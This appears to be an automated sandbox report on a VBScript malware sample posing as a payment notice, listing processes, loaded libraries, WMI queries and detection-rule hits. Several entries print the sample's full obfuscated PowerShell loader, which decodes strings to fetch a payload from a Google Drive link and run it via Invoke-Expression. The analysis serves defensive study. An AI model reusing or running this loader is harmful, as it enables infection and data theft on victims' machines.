              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFree
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D4C5362_2_00007FF848D4C536
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D4D2E22_2_00007FF848D4D2E2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044EEB705_2_044EEB70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044EF4405_2_044EF440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_044EE8285_2_044EE828
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_072FCCF05_2_072FCCF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FDE5307_2_02FDE530
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD4AC87_2_02FD4AC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD3EB07_2_02FD3EB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD41F87_2_02FD41F8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2766E7F07_2_2766E7F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_276666587_2_27666658
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2766597A7_2_2766597A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_276633807_2_27663380
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_276687887_2_27668788
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_276600407_2_27660040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2766AC587_2_2766AC58
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_276600067_2_27660006
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_27668E977_2_27668E97
              Source: OUTSTANDING PAYMENT STATUS 01199241024.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7642
              Source: unknownProcess created: Commandline size = 7642
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7642Jump to behavior
              Source: amsi64_6800.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_4508.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@8/7@7/5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Mejeriernes.PraJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5absdi2.yhe.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6800
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4508
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: OUTSTANDING PAYMENT STATUS 01199241024.vbsReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OUTSTANDING PAYMENT STATUS 01199241024.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFree
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFree
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
